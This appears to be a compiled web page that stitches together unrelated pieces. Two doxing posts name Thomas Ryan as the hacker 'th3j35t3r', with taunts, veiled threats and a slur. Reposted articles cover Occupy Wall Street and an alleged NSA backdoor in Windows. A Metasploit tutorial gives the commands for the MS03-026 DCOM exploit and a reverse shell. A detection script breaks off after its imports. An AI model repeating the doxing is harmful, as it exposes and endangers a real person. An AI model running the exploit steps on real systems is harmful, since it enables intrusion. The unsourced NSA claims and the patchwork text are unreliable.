#17: When LulzKitten tweeted Jester’s dox on 29th March, how did Tom Ryan – the man with the military wallpaper on his Twitter page – respond? “@J_P_Holloway @lulzkitten @YourAnonNews you guys really suck at DOXing thinking I am @th3j35t3r everyone knows I was never in the Army #fail”

https://twitter.com/#!/TomRyanBlog/status/185189598677319680

Two things stand out here: firstly, we have no way of knowing that Jester was in the army. Yes, he has an interest in all things military, but the rumor that he actively served in the army is widely believed to be false.

On 13th March however, TR tweeted the following: “When I was in the military, Greenpeace would try to board Aircraft Carriers. Some things aren’t smart & never thought of till it’s too late.”

https://twitter.com/#!/TomRyanBlog/status/179637065154170880

Military, shmilitary; does anyone see a connection here? Thought so. Without further ado, let’s proceed to our final, fateful tweet of interest. On 10th February, Thomas Ryan tweeted the following:

“I wonder if operating Multiple Personas has ever given anyone Multiple Personality Disorder.”

I don’t know Jester, you tell me ;) Tick tock. No response? Oh well, Stay Frosty…

**********

POSTSCRIPT: Could it be that Tom Ryan is such an attention-whore that he’s trolling us all in the hope of being mistaken for the Jester? I guess it’s technically possible, but if so, it’s the most elaborate and painstaking trolling campaign ever conceived – and one that would have to involve the collusion of both parties. If, by some miracle, Thomas Ryan is not Jester, he knows exactly who Jester is – to the extent where he probably even vacations with him. When you review all the evidence however, there can only be one logical conclusion to draw: they are one and the same person.

On 13th March, Tom Ryan posted the following poignant message: “@ArtByAlida although Anonymous doesn’t like @th3j35t3r I do. It’s safer that certain people are never doxed.”

https://twitter.com/#!/TomRyanBlog/status/179636120710152192

You’re right Tom – it would be safer, but the truth always comes out in the wash, don’t you find? I hope you’ve got a few passports lying around, cos you’re gonna need them. Remember those Muslim extremists whose websites you downed and whose threats you retweeted? Oh, they mad. They real mad.

One last thought before I shovel the dirt over Jester’s shriveled corpse: I notice that your Twitter nick is Boondock Saint, in tribute to The Boondock Saints, a movie about two Irish vigilantes. Just out of interest, I wonder what The Internet Surname Database would make of Thomas Ryan’s moniker?

http://www.surnamedb.com/Surname/Ryan

Why, they appear to believe that Ryan is an Irish surname. To quote from my favorite hacktivist for good, ‘Coincidence much?’

Congratulations Thomas; you just got pwned by an amateur who doesn’t even have the skills to label himself a skid, never mind a hacker. Butthurt much?

In the words of your nemesis, @anonymouSabu, “Nigga, troll harder.”

pwned by @spoolfiend

**********

Citations:

LulzKitten tweet linking TR and J: https://twitter.com/?utm_medium=twitter&utm_source=twitterfeed#!/YourAnonNews/statuses/185150794079809536

Check when th3j35t3r and RobinSage joined Twitter: http://www.whendidyoujointwitter.com/

TR’s LinkedIn (where you’ll see proof that he attended Hacker Halted and DEFCON last year): http://www.linkedin.com/in/tommyryan

TR and J professing their love of sushi:
https://twitter.com/#!/TomRyanBlog/status/178202424056610817
https://twitter.com/#!/th3j35t3r/status/128849629939892224

Tom Ryan dox by AntiSec: http://pastebin.com/ZAxBWKi8

J likes to say ‘Hmmm’ a lot:

https://twitter.com/#!/th3j35t3r/status/187996120180457472

Occupy Wall Street?? 99%?? Ummm.

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/174163673940631552

https://twitter.com/#!/th3j35t3r/status/182268058168082432

https://twitter.com/#!/th3j35t3r/status/187535767843778560

TR also likes to say ‘Hmmm’:

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/180117386291195906

https://twitter.com/#!/TomRyanBlog/status/178896960546287617

https://twitter.com/#!/TomRyanBlog/status/177482894443417600

https://twitter.com/#!/TomRyanBlog/status/170195932388925441

https://twitter.com/#!/TomRyanBlog/status/189680060863754241

J goes ‘Tick tock’:

https://twitter.com/#!/th3j35t3r/status/96268183723450369

https://twitter.com/#!/th3j35t3r/status/177033974324002816

https://twitter.com/#!/th3j35t3r/status/83145887307677696

https://twitter.com/#!/th3j35t3r/status/95195869921554433

https://twitter.com/#!/th3j35t3r/status/98828156663889920

Lulzsec’s CloudFlare Configuration

TR goes ‘Tick tock’:

https://twitter.com/#!/TomRyanBlog/status/174132025215811585

J ‘Stay frosty’:

https://twitter.com/#!/th3j35t3r/status/186923663734489088

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/129246959021203456

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/81862725638160385

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TR ‘Stay frosty’:

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179298552680415232

https://twitter.com/#!/TomRyanBlog/status/178571536691765249

https://twitter.com/#!/TomRyanBlog/status/178529239052730368

https://twitter.com/#!/TomRyanBlog/status/178336251240382464

https://twitter.com/#!/TomRyanBlog/status/179622057305317376

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

J likes to wink:

https://twitter.com/#!/th3j35t3r/status/184373769958211584

https://twitter.com/#!/th3j35t3r/status/120271829377097728

https://twitter.com/#!/th3j35t3r/status/76373640832225282

https://twitter.com/#!/th3j35t3r/status/185019516793786370

https://twitter.com/#!/th3j35t3r/status/81477469135319040

https://twitter.com/#!/th3j35t3r/status/178878010961833986

TR likes to wink:

https://twitter.com/#!/TomRyanBlog/status/187885131976024064

https://twitter.com/#!/TomRyanBlog/status/187372927946211328

https://twitter.com/#!/TomRyanBlog/status/179932280809197568

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/169492746871119873

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

https://twitter.com/#!/TomRyanBlog/status/179669923163938816

https://twitter.com/#!/TomRyanBlog/status/187914228810784769

J ‘much?’:

https://twitter.com/#!/th3j35t3r/status/82200919365787648

https://twitter.com/#!/th3j35t3r/status/81871769832665088

If ya can’t beat em, make some shit up??? LMAO!

TR ‘much?’:

https://twitter.com/#!/TomRyanBlog/status/179927195022659584

J ‘…’:

https://twitter.com/#!/th3j35t3r/status/189139338796351492

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/186749312166932483

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/138951576789331968

https://twitter.com/#!/th3j35t3r/status/168769540598145025

https://twitter.com/#!/th3j35t3r/status/179233292682407937

https://twitter.com/#!/th3j35t3r/status/184321677092597760

TR ‘…’:

https://twitter.com/#!/TomRyanBlog/status/188088227704487936

https://twitter.com/#!/TomRyanBlog/status/187342615648272384

https://twitter.com/#!/TomRyanBlog/status/188829946439929856

https://twitter.com/#!/TomRyanBlog/status/189449964219400194

https://twitter.com/#!/providesecurity/status/187253830315016192

https://twitter.com/#!/TomRyanBlog/status/189757038778269696

https://twitter.com/#!/Render64/status/187912159655772161

J ‘<<arrows>>’:

https://twitter.com/#!/th3j35t3r/status/189463655811780609

https://twitter.com/#!/th3j35t3r/status/185019516793786370

TR ‘<<arrows>>’:

https://twitter.com/#!/TomRyanBlog/status/179683104972210176

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/178555495806803968

https://twitter.com/#!/TomRyanBlog/status/179321093897723904

J using UPPER case:

https://twitter.com/#!/th3j35t3r/status/189165520556277761

https://twitter.com/#!/th3j35t3r/status/178895612723478531

https://twitter.com/#!/th3j35t3r/status/181438361511280640

https://twitter.com/#!/th3j35t3r/status/82538803188862976

https://twitter.com/#!/th3j35t3r/status/98386681836736512

https://twitter.com/#!/th3j35t3r/status/177544329458491392

https://twitter.com/#!/th3j35t3r/status/135438221483048960

https://twitter.com/#!/th3j35t3r/status/177568887334903808

https://twitter.com/#!/th3j35t3r/status/110676313366462464

https://twitter.com/#!/th3j35t3r/status/127396730621788160

https://twitter.com/#!/th3j35t3r/status/100282273072549890

https://twitter.com/#!/th3j35t3r/status/178566407909412866

https://twitter.com/#!/th3j35t3r/status/132173511874711552

https://twitter.com/#!/th3j35t3r/status/94485325744848896

https://twitter.com/#!/th3j35t3r/status/97333572955947008

https://twitter.com/#!/th3j35t3r/status/91970882095943680

https://twitter.com/#!/th3j35t3r/status/141002481260961792

TR using UPPER case:

https://twitter.com/#!/TomRyanBlog/status/187908914417893379

https://twitter.com/#!/TomRyanBlog/status/188461215348031489

https://twitter.com/#!/TomRyanBlog/status/187018163567853568

https://twitter.com/#!/TomRyanBlog/status/185423913197637633

https://twitter.com/#!/TomRyanBlog/status/187240901574266881

https://twitter.com/#!/TomRyanBlog/status/180380942614016001

https://twitter.com/#!/TomRyanBlog/status/187903623693467648

https://twitter.com/#!/TomRyanBlog/status/187361681452699649

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187322975383588864

https://twitter.com/#!/TomRyanBlog/status/187309018623127552

https://twitter.com/#!/TomRyanBlog/status/187558445036216320

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187656738818899968

https://twitter.com/#!/TomRyanBlog/status/187261297669308416

https://twitter.com/#!/TomRyanBlog/status/187530160134828032

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

Jester ‘LMAO!’:

https://twitter.com/#!/th3j35t3r/status/105305979733815296

TR ‘ROFLMAO!’:

https://twitter.com/#!/TomRyanBlog/status/180709354624925696

https://twitter.com/#!/TomRyanBlog/status/179773457943371776

https://twitter.com/#!/TomRyanBlog/status/187709243087003650

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

https://twitter.com/#!/TomRyanBlog/status/187272732147322880

https://twitter.com/#!/TomRyanBlog/status/187583747154132992

J struggles with apostrophes:

https://twitter.com/#!/th3j35t3r/status/83239272504770560

https://twitter.com/#!/th3j35t3r/status/177080046597578752

https://twitter.com/#!/th3j35t3r/status/186749312166932483

(See his blog for heaps more examples.)

http://www.youtube.com/watch?v=WeO44IWlkfU (Skip to 5:07); ‘lets’, ‘its’ and ‘Thats’ should all have apostrophes.

http://www.youtube.com/watch?v=yJTvzErKHWE Look at the Notepad he’s typing into: ‘lets’ should have an apostrophe and ‘peak’ should have two ‘e’s in it. Skip to 2:20: the text on Jester’s self-designed Xerxes machine also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle. At 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also types the same misspelt word into Notepad.

TR also struggles with apostrophes:

https://twitter.com/#!/TomRyanBlog/status/187920367845781504

https://twitter.com/#!/TomRyanBlog/status/187710784690855936

https://twitter.com/#!/TomRyanBlog/status/180432605680902144

https://twitter.com/#!/TomRyanBlog/status/187645320442822656

https://twitter.com/#!/TomRyanBlog/status/187531807598714880

https://twitter.com/#!/TomRyanBlog/status/187917710498336769

https://twitter.com/#!/TomRyanBlog/status/185737304290234368

https://twitter.com/#!/TomRyanBlog/status/178485680899502081

J tweets ‘TANGO DOWN’:

https://twitter.com/#!/th3j35t3r/status/175040242477318144

https://twitter.com/#!/th3j35t3r/status/175029005718794240

TR tweets ‘TANGO DOWN’:

https://twitter.com/#!/TomRyanBlog/status/186482996352778240

https://twitter.com/#!/TomRyanBlog/status/186482690797744128

J always writes numbers numerically:

https://twitter.com/#!/th3j35t3r/status/174540542724669441

https://twitter.com/#!/th3j35t3r/status/93771304607563776

https://twitter.com/#!/th3j35t3r/status/114830590452310016

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/140925221090758656

https://twitter.com/#!/TomRyanBlog/status/185576329712910336

TRB always writes numbers numerically:

https://twitter.com/#!/TomRyanBlog/status/187211721365139456

https://twitter.com/#!/TomRyanBlog/status/187712594373648384

https://twitter.com/#!/TomRyanBlog/status/178965908696481793

https://twitter.com/#!/TomRyanBlog/status/187680293984022529

https://twitter.com/#!/TomRyanBlog/status/187539614876176384

Compare TR and J’s tweet patterns, in particular the time of day they tweet at and the hashtags they use: http://tweetstats.com (Open two separate windows and enter their Twitter names).

J using #Fail:

https://twitter.com/#!/th3j35t3r/status/132152349639720960

https://twitter.com/#!/th3j35t3r/status/103200916156588032

https://twitter.com/#!/th3j35t3r/status/102784136015646722

https://twitter.com/#!/th3j35t3r/status/97030633330716674

https://twitter.com/#!/th3j35t3r/status/178966110694150144

TR using #Fail:

https://twitter.com/#!/TomRyanBlog/status/187708057344671744

https://twitter.com/#!/TomRyanBlog/status/167697098047889411

https://twitter.com/#!/TomRyanBlog/status/177978089203175424

https://twitter.com/#!/TomRyanBlog/status/178269119316107264

https://twitter.com/#!/TomRyanBlog/status/186927307544477697

https://twitter.com/#!/TomRyanBlog/status/178573080438898689

https://twitter.com/#!/TomRyanBlog/status/178982123959619585

https://twitter.com/#!/TomRyanBlog/status/185189598677319680

https://twitter.com/#!/TomRyanBlog/status/186930868273676288

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

J using #Justsayin:

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TRB using #Justsayin:

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/179578215411630080

https://twitter.com/#!/TomRyanBlog/status/178518183525888000

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

https://twitter.com/#!/TomRyanBlog/status/184270112361168898

_________________________________________________________________________

PIRAX DOXING CONTINUED…  (The ‘smedley manning’ debacle)
You took this DOX’ing really well, to be honest. You shook it off as a mere fancification numerous times, and continued forward head-strong, apparently unmoved by those watching from the outside. But you knew deep-down that you had to eradicate this DOX from the minds of the enemies you have procured over the years. You know that a lot of people would like to see you gone. So, you came up with a plan.

The plan went something like this:
On May 10th, you registered the Twitter account @cubespherical and labeled it as “Smedley Manning”, as an obvious satirical homage to the now imprisoned Bradley Manning, a REAL soldier who fought for truth. You then exchanged a few messages with @th3j35t3r to make it look like a legitimate conversation, and began to “leak” information about yourself. We both know that this information is false, and was only created to distract others from the real DOX, located above. We know you are somewhat intelligent. However, there will always be those who will outsmart you. Consider yourself outsmarted.

Here is the analysis, broken down:
After you took down both your Twitter and WordPress blog, the mainstream blogosphere was certain you had finally been figured out. They assumed this was your acknowledgement of your own defeat and were positive you had been successfully DOX’d by @cubespherical. You were finally giving up. You knew they would react this way… It was all a part of your master plan. But, in reality, you ARE @cubespherical. Yes, @th3j35t3r and @cubespherical are the same person. Nicely done, Tom. You fooled almost everyone. But, like all good things (“good” meaning something along the lines of “idiotic” in this case), you must come to an end.

So how can we justify this claim? Where is our proof? Simple: You gave us everything.

Red-Flag #1: You have been a pretty regular user of Twitter until very recently, after the above DOX was published.

Red-Flag #2: An entirely new DOX is now being teased, even while the above DOX is as sure-fire as they come. Who would believe that a DOX coming from @cubespherical, an entirely new one at that, would be legitimate?

Red-Flag #3: You sat idle on Twitter while @cubespherical AKA Smedley Manning openly talked shit about you, only responding once things became heated on InfoSecIsland. This will take some psychological investigation, but it is damning nonetheless. Your article here is the most revealing bit of all:

http://www.infosecisland.com/blogview/21348-Not-Totally-Sure-What-Just-Happened.html

You started off with the following line, paraphrased: “I thought Smedley was my friend at first [you used the word ‘supporter’] hurr durr, but he then started threatening me hurr durr.” That doesn’t even sound realistic. But it *is* a subtle way to garner sympathy. I applaud you for your effort.

Red-Flag #4: Next up is your subtle jab at Anonymous. You changed @cubespherical’s avatar to a picture of a Guy Fawkes mask and deleted the Bitcoin address in exchange for the “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.” motto.

In your article, you say “Even if this was a common troll, he just demonstrated that any fool can speak for and ‘as’ Anonymous.”

It is clear that you did this for one reason: to throw spears at Anonymous while appearing to be a victim of cyber-bullying on a much grander scale.

Red-Flag #5: You are subconsciously promoting @cubespherical’s efforts for Bitcoin donations.
While appearing to mock @cubespherical, while still somehow conveying him as a threat, you still manage to forget to *NOT* post his Bitcoin address. Our thoughts: You WANT @cubespherical to make some money off of some Bitcoin donations. You yourself use Bitcoin pretty regularly and accept it for donations on your blog. How do we know you aren’t just promoting @cubespherical’s Bitcoin address so that YOU can profit? Here are your words, directly lifted from your blog post:

“So here’s the throwdown. ‘Smeddles’ drop my dox. Do it. You have proved and shown nothing. Only that you are completely failing. You have no bitcoins donated, you have shown 2 things to me, Anonymous have too many chiefs and not enough indians, and that your numbers, at least 9000 allegedly, combined have 0.00000001 bitcoins between them. Here is what you have so far. lol.

https://blockexplorer.com/address/15JDgkwFVXvuxCt66eUQ434ty3jrvwPfGe

Either that or they were clever enough to realize you were full of it from the get go. As I have demonstrated and stated many times before, I will never ask the public for any money.”

WHY WOULD YOU EVEN NEED TO REMIND PEOPLE THAT YOU DON’T ASK FOR DONATIONS IF THIS ISN’T EVEN YOUR BITCOIN ADDRESS? Simple. Because it actually is.

It is also worth noting that both Smedley Manning and th3j35t3r favor Ubuntu 11.xx releases. They like using GNOME, too:
http://3.bp.blogspot.com/-9LpW_-t2lkU/TpmnnnPHn6I/AAAAAAAABMA/AKBOIZUm4sM/s1600/Opera-Next-Ubuntu-Oneric.png
http://4.bp.blogspot.com/_FJH0hYZmVtc/TF59PLnLUJI/AAAAAAAAJNE/IoVU8sTFyUo/s1600/Opera+Mobile+for+Linux+(1440×797)_023.png

To conclude this talk, Tom, we would like to take this privilege to give to you a formal FUCK YOU. You have been DOX’d and your master plan to avoid the inevitable by creating a new nemesis and a new DOX while asking fools to send you money for this bogus DOX has been foiled. You are over. No one cares about the small sites you take down with your shitty XerXes tool and everyone knows you didn’t actually DDoS WikiLeaks, or even have the ability to do so. You are a fame-whoring idiot that has finally been pulled so low, you serve no purpose for ever standing up again. Goodbye.

XOXO,
PiraX <3

@TheRealPiraX
http://pirax.de
Donate Bitcoin: 17gMaYgUsx7dj532s3ezXmfMrVhJ1BfRC1
We would also like to give a shout-out to our home on VoxAnon IRC. Much love to #voxanon

_________________________________________________________________________

BUT THATS NOT IT – DON’T FORGET THIS LITTLE GEM…

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

The Occupy Wall Street protests have been going on for a month. And it seems the FBI and NYPD have had help tracking protesters’ moves thanks to a conservative computer security expert who gained access to one of the group’s internal mailing lists, and then handed over information on the group’s plans to authorities and corporations targeted by protesters.

Since the Occupy Wall Street protest began on September 17, New York security consultant Thomas Ryan has been waging a campaign to infiltrate and discredit the movement. Ryan says he’s done contract work for the U.S. Army and he brags on his blog that he leads “a team called Black Cell, a team of the most-highly trained and capable physical, threat and cyber security professionals in the world.” But over the past few weeks, he and his computer security buddies have been spending time covertly attending Occupy Wall Street meetings, monitoring organizers’ social media accounts, and hanging out with protesters in Lower Manhattan.

As part of their intelligence-gathering operation, the group gained access to a listserv used by Occupy Wall Street organizers called September17discuss. On September17discuss, organizers hash out tactics and plan events, conduct post-mortems of media appearances, and trade the latest protest gossip. On Friday, Ryan leaked thousands of September17discuss emails to conservative blogger Andrew Breitbart, who is now using them to try to smear Occupy Wall Street as an anarchist conspiracy to disrupt global markets.

What may be much more alarming to Occupy Wall Street organizers is that while Ryan was monitoring September17discuss, he was forwarding interesting email threads to contacts at the NYPD and FBI, including special agent Jordan T. Loyd, a member of the FBI’s New York-based cyber security team.

Oh, and what do real PATRIOT VETERANS think … ?


VETERAN: We didn’t “serve our country”; We serve the interests of Capital

“I’ve seen a ton on the facebooks about “thanking veterans for their service.” As a veteran let me just be very straightforward and honest with you. We didn’t “serve our country”; we don’t actually serve our brothers/sisters or our neighbors. We serve the interests of Capital. We never risked our lives or spent months on deployment away from our family and friends so they can have this abstract concept called “freedom”. We served big oil; big coal; Coca-Cola; Kellogg, Brown, and Root and all the other big Capital interests who don’t know a fucking thing about sacrifice. These people will never have to deal with the loss of a loved one or the physical and/or psychological scars that those who “serve”, and their families, have to deal with for the rest of their lives. The most patriotic thing someone can do is to tell truth to power and dedicate yourself to building power to overthrow these sociopathic assholes. I served with some of the most real and genuine people I’ve ever met. You’ll never see solidarity like the kind of solidarity you experience when your life depends on the person next to you. But most of us didn’t join for that; we joined because we were fucking poor and didn’t have many other options.”       -Anonymous

IN CONCLUSION:  An obvious desperate grab to stay relevant – Does anyone care?

ANSWER: jester who?  Now back to projects that create positive change in the world, instead of discussing individuals who support & enable the Military Industrial Complex of death, destruction, and global enslavement of Humanity.

OH AND FOR THOSE WHO FORGOT, A REMINDER:

[Image: cia-owns-al-qaeda]

How NSA access was built into Windows

Careless mistake reveals subversion of Windows by NSA?

A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA “help information” trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled.

The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA.

Is Anonymous The Internet’s Most Powerful Mirage?

You may have noticed it last week. Anonymous claimed the scalp of yet another major government agency.

Supporters of the online movement of activists and internet trolls said they’d stolen 1.7 GB of data from an agency within the Department of Justice that aggregates crime data. They claimed to have nabbed “lots of shiny things such as internal emails and the entire database dump.” They branded the heist as “Monday Mail Mayhem,” and said it could help people “know the corruption in their government.” They posted it on Pirate Bay as a torrent, for anyone to see — and 1.7 GB was just the size of the zipped file.

Not many people bothered to check what was actually in the huge file.

Step in Identity Finder, a software security firm. Privacy officer Aaron Titus downloaded the payload last week and sifted through it all, checking out the veracity of the claims by Anonymous.

Turned out they were overhyped.

The zipped file contained 6.5 GB of web server files and “does not appear to contain any sensitive personal information, internal documents, or internal emails,” according to Titus. A folder named “Mail” was mostly empty, though it contained two administrative email addresses. There were also no personal details (social security numbers or credit card numbers), and the worst the breach had done was reveal the site’s web server file, which could be leveraged by other hackers for future attacks.

It looked like the breach had done more to grab attention from the media and the Department of Justice than do any real damage.

Surprised? You shouldn’t be. This was another illustration of the power of Anonymous as a continuing online insurgency: not in hacking per se, but its constant ability to grab eyeballs, project power, and give followers a voice and sense of purpose unlike any they’ve experienced before. What’s important for companies and policy makers (the typical targets) to note is that it’s oftentimes more a tease than anything else.

Other examples:

1) Earlier this month Fox News reported that an online group called TheWikiBoat, aligned with Anonymous, planned to bring down the websites of 46 major companies on Friday May 25. TheWikiBoat said in a public statement that it had “no motives other then [sic] doing it for the lulz,” (i.e. for shits and giggles). The FBI’s Cyber Division was concerned enough to send an email to the likes of Apple Computer, McDonald’s and ExxonMobile warning them of a potential attack — which didn’t happen.

2) Around this time last year, a single supporter of Anonymous managed to grab global headlines when he tweeted that he had a cache of bank of America emails. What he eventually released was an e-mail exchange between himself and a BofA ex-staffer who made (what admittedly looked like valid) complaints about the bank’s management. But it did nothing to the bank’s stock price, and the news agenda quickly moved on.

3) In December 2010 Anonymous claimed responsibility for taking down the websites of PayPal, MasterCard and Visa after these firms nixed online donations to WikiLeaks. How? Supporters implied it was thanks to thousands of volunteers who had become part of a cyber army by downloading a software tool called LOIC. What really happened: a couple of supporters with botnets temporarily took the sites down — but the notion that Anonymous was an international “army” of hacktivists was left floating around the Internet.

Time and again, online supporters have laid claim to the brand power of Anonymous, invoking its name, imagery such as the Guy Fawkes logo and headless, suited man surrounded by olive leaves, along with the tag line, “We are Anonymous… Expect us.” The result: news outlets and policy makers sit up and listen, more so than they would if those supporters used their real names, or were literally anonymous. The power of Anonymous is propagated by the continued use of a name wrapped in hype and disinformation, more than the occasional real hacks.

The Anonymous “brand” gets street cred from cyber attacks carried out by a minority of hackers who know how to use SQL injection techniques or who know people who control botnets. The additional hype comes from the impassioned, sometimes-threatening rhetoric of less-skilled-but-enthusiastic followers on Twitter or the imageboard 4chan.

Why do these supporters join in? Everyone has their own reasons — something to do, the engaging community of people to talk to, the thrill of being part of a secret crowd. Sources in Anonymous that I have spoken to over the last year often speak to a sense of purpose they get from Anonymous, and sometimes the justification to do the subversive, often-illegal things online that they would not otherwise do. It’s mob mentality with a twist — the activist element of protest, twinned with the culture of trolling and exaggeration that runs through image boards like 4chan.

For law enforcement, who happen to chase anarchists with particular zeal in the United States, there isn’t so much a criminal organization to rope in as the mirage of one. No system with leaders and rules, but a culture and etiquette that is changing all the time. Many of the figureheads who organized the Anonymous attacks against Scientology in 2008 have left the community to focus on college or full-time jobs, many happy to break away from the frenetic pace of operations and the constant paranoia about getting doxxed. Those who’ve been arrested are upheld as martyrs within the network, and there are many more who are joining, and who think they can do a better job of hiding from the police.

Anonymous will continue to exist for some time, taking new followers, changing tactics, and often staying one spontaneously-placed step ahead of the police. They’ll fight for the right to their anonymity, to expose other people’s information, or anything they want, and they’ll come and go from the headlines. But these chaotic actors will stick around, and their greatest power will continue to be not their skills or abilities, but the very name that they can invoke.

For more details on how Anonymous works and the real, human stories behind it, check out my forthcoming book, “We Are Anonymous: Inside the Hacker World Of LulzSec, Anonymous and the Global Cyber Insurgency.”

Or follow me on Twitter: @parmy

SOURCE: http://www.forbes.com/sites/parmyolson/2012/05/30/is-anonymous-the-internets-most-powerful-mirage/

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP

In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.

Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

  • Exploit

Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.

  • Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

  • Shellcode

This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.

  • Module

A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.

  • Listener

This is the component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.

  • Show

Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.

Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1 Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the Metasploit console.

msfconsole

Be patient, it takes a while for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2 Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom

Step 3 Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.

msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4 Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.

msf > show options

Step 5 Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.

msf > set RHOST 10.0.0.3

Step 6 Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads

Step 7 Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD generic/shell_reverse_tcp

Step 8 Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our attacking machine has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking from. Tools such as nmap can help you obtain IP addresses.

msf > set LHOST 10.0.0.6

Step 9 Exploit

Now we command Metasploit to exploit the system:

msf > exploit

Step 10 Open a Shell on the Hacked System

Type the command sessions -i 1 to open a command shell on the XP system that will appear on your Metasploit console.

sessions -i 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!

C:\>dir

Congratulations! You have just hacked your first system using Metasploit!
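Seen from the defender's side, the sequence in steps 5 through 9 leaves a characteristic two-part trace: an inbound connection to TCP port 135 (the port the tutorial says the MS03-026 exploit binds) followed shortly afterwards by an outbound connection from the same host back to the peer that connected to it, which is the shape of the generic/shell_reverse_tcp payload used above. The following detection script is an added example and is not part of the original tutorial or of Metasploit; the firewall log format, the timestamps, the five-minute correlation window and the callback port 4444 are all constructed for the example.

```python
"""Detection example (added here; not from the original tutorial or from
Metasploit): correlate an inbound connection to TCP/135 with a later outbound
connection from the probed host back to the prober, the trace a reverse-shell
payload leaves after an RPC DCOM exploit.  The log format below is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

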